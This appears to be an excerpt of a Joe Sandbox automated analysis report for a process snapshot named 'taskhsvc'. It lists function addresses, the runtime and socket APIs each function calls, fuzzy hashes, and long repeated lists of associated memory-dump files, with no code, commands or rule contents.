Instruction Fuzzy Hash: 3CF0ECB09047069FCB10DF6DC5456AEBBF0AF48314F148628F569DB394D77499058F92

Uniqueness

Uniqueness Score: -1.00%

Function 00EF1144 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 00EF107E: abort.MSVCRT ref: 00EF10D1
Part of subcall function 00EF107E: malloc.MSVCRT ref: 00EF10E9
Part of subcall function 00EF107E: exit.MSVCRT ref: 00EF112A
Part of subcall function 00EF107E: __stack_chk_fail.LIBSSP-0 ref: 00EF113D

memset.MSVCRT ref: 00EF117D
__stack_chk_fail.LIBSSP-0 ref: 00EF1190

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortexitmallocmemset
String ID:
API String ID: 1546916363-0
Opcode ID: 62f8998e41e3ef5de2a9c2c0f86715f0c6326e7fb22d95a823abba218eb48683
Instruction ID: 44a6323e9c70f4c51731c001a8aea54384c2bbf20c3d62c7c60e76275a61a1f5
Opcode Fuzzy Hash: 62f8998e41e3ef5de2a9c2c0f86715f0c6326e7fb22d95a823abba218eb48683
Instruction Fuzzy Hash: 31F067B4E0420A9FCB40EFA8C585A6EBBF0AF48304F418859E954E7315D674A9429F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE72A4 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00EE72DB
__stack_chk_fail.LIBSSP-0 ref: 00EE72F0

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failioctlsocket
String ID:
API String ID: 496226349-0
Opcode ID: fd9a77a6286aad718d38f4887265678f4cf360905211f64fa14714ad62f67e63
Instruction ID: 98a2ed4ee0686425ab969f76379e575fbb2f93f780b9775aa7b9b311f41cf253
Opcode Fuzzy Hash: fd9a77a6286aad718d38f4887265678f4cf360905211f64fa14714ad62f67e63
Instruction Fuzzy Hash: 42F0F870D0420A9BCB00DFBDC54166EBBF0EB48308F008428E454EB354E774A915CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00EE2D3B Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EE2E49

Part of subcall function 00EE2B7A: __stack_chk_fail.LIBSSP-0 ref: 00EE2C03

Part of subcall function 00EE9D53: __stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 6cb9edc0f8d31ea78991896ea25aab777d7f824a16f877d095e9182460f23cf8
Instruction ID: ba0e0a89195c1850f3896fbc1d5068614dfdda5fca560dd988f938c9e7289bba
Opcode Fuzzy Hash: 6cb9edc0f8d31ea78991896ea25aab777d7f824a16f877d095e9182460f23cf8
Instruction Fuzzy Hash: 7A4160B4E052199FCB40DFAAC984A9EBBF4BF48354F11D819E958E7314E334E8418F61

Uniqueness

Uniqueness Score: -1.00%

Function 00D91F06 Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 00D91D0A: abort.MSVCRT ref: 00D91D5B
Part of subcall function 00D91D0A: abort.MSVCRT ref: 00D91E4B
Part of subcall function 00D91D0A: __stack_chk_fail.LIBSSP-0 ref: 00D91ED0

__stack_chk_fail.LIBSSP-0 ref: 00D91FFB

Part of subcall function 00D9262A: abort.MSVCRT ref: 00D9267A
Part of subcall function 00D9262A: __stack_chk_fail.LIBSSP-0 ref: 00D92745

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: 6e0a483ba25106d646d03357b9e1740685484dbe12ffb319beea528abb44ed87
Instruction ID: 52fb2a5a88d936185797a05380c22e7b6e35028fe5ca8f7bf31cbfb4c71e63ba
Opcode Fuzzy Hash: 6e0a483ba25106d646d03357b9e1740685484dbe12ffb319beea528abb44ed87
Instruction Fuzzy Hash: E8317AB9E1464A8FCF10EFA9C085A6EB7F1EF44344F054459E894DB312D738D882CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E8354C Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00E91E90: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00E08007), ref: 00E91EC8

Part of subcall function 00E84093: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00E3B89E), ref: 00E840C7

__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E83295), ref: 00E8362A

Part of subcall function 00E840CE: abort.MSVCRT ref: 00E8412D
Part of subcall function 00E840CE: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00E3B8C3), ref: 00E8416C

Part of subcall function 00E83023: abort.MSVCRT ref: 00E8308D
Part of subcall function 00E83023: __stack_chk_fail.LIBSSP-0 ref: 00E83141

Part of subcall function 00E833E8: abort.MSVCRT ref: 00E8348F
Part of subcall function 00E833E8: __stack_chk_fail.LIBSSP-0 ref: 00E83545

Memory Dump Source

Source File: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
